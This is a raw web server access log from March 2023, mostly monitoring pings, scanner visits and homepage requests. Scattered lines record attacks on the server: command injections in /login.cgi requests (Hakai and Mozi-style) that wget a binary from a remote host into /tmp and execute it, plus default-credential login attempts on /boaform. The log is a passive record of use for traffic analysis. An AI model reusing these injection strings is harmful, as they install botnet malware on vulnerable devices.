113.108.9.38 - - [05/Mar/2023:06:26:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
167.94.146.59 - - [05/Mar/2023:06:29:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.59 - - [05/Mar/2023:06:29:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.59 - - [05/Mar/2023:06:29:32 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.59 - - [05/Mar/2023:06:29:32 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
89.248.174.154 - - [05/Mar/2023:06:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
89.248.174.154 - - [05/Mar/2023:06:36:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
89.248.174.154 - - [05/Mar/2023:06:38:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
223.240.99.104 - - [05/Mar/2023:06:39:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.246.220.98 - - [05/Mar/2023:06:39:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
89.248.174.154 - - [05/Mar/2023:06:39:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
8.18.50.101 - - [05/Mar/2023:06:45:05 +0100] "CONNECT 212.87.212.168:4444 HTTP/1.1" 405 345 "-" "-"
193.32.162.159 - - [05/Mar/2023:06:45:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.248.174.154 - - [05/Mar/2023:06:50:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
177.126.58.10 - - [05/Mar/2023:06:51:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
193.32.162.159 - - [05/Mar/2023:06:53:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
110.80.136.230 - - [05/Mar/2023:06:58:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
139.59.79.219 - - [05/Mar/2023:06:59:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
212.91.246.72 - - [05/Mar/2023:07:00:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:01:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.174.154 - - [05/Mar/2023:07:01:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [05/Mar/2023:07:02:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:03:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:04:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.248.174.154 - - [05/Mar/2023:07:04:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
167.94.146.59 - - [05/Mar/2023:07:04:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.59 - - [05/Mar/2023:07:04:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.59 - - [05/Mar/2023:07:04:33 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.59 - - [05/Mar/2023:07:04:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [05/Mar/2023:07:05:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:06:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:07:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:08:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.118.40.97 - - [05/Mar/2023:07:09:01 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
117.215.249.182 - - [05/Mar/2023:07:09:05 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [05/Mar/2023:07:09:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:10:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.220.98 - - [05/Mar/2023:07:10:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [05/Mar/2023:07:11:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [05/Mar/2023:07:11:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Mar/2023:07:12:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:12:48 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:13:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:13:48 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:14:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:14:35 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:15:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:16:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [05/Mar/2023:07:16:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Mar/2023:07:17:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:18:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:19:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:20:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:20:28 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:21:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:22:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:23:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:24:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:24:12 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:25:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [05/Mar/2023:07:25:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Mar/2023:07:26:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:26:10 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:27:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:28:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:29:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:30:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:31:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:31:10 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.246.220.98 - - [05/Mar/2023:07:31:47 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:32:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:33:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:33:18 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
143.244.50.172 - - [05/Mar/2023:07:33:33 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:34:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:35:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [05/Mar/2023:07:35:45 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:36:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [05/Mar/2023:07:36:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Mar/2023:07:37:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:38:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [05/Mar/2023:07:38:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [05/Mar/2023:07:39:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.109.179.46 - - [05/Mar/2023:07:39:37 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
212.91.246.72 - - [05/Mar/2023:07:40:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:41:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:42:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:43:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [05/Mar/2023:07:43:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:07:43:59 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:07:44:01 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [05/Mar/2023:07:44:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [05/Mar/2023:07:44:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Mar/2023:07:45:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:46:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:47:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:48:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:49:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:50:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:51:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:52:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:53:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:54:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.34.146.227 - - [05/Mar/2023:07:54:27 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
183.136.225.32 - - [05/Mar/2023:07:55:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [05/Mar/2023:07:55:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:56:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.220.98 - - [05/Mar/2023:07:56:12 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:07:57:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:58:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:07:59:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [05/Mar/2023:07:59:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:08:00:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [05/Mar/2023:08:00:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [05/Mar/2023:08:00:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [05/Mar/2023:08:01:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:02:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [05/Mar/2023:08:02:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [05/Mar/2023:08:03:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.246.131.205 - - [05/Mar/2023:08:03:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Mar/2023:08:04:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:05:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:06:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:07:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [05/Mar/2023:08:07:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:08:07:31 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Mar/2023:08:07:35 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [05/Mar/2023:08:08:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:09:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:10:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:11:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:12:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:13:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:14:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:15:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:16:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:17:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:18:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:19:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:20:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:21:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:22:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:23:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2023:08:24:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.220.98 - - [05/Mar/2023:08:24:41 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Mar/2023:08:25:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
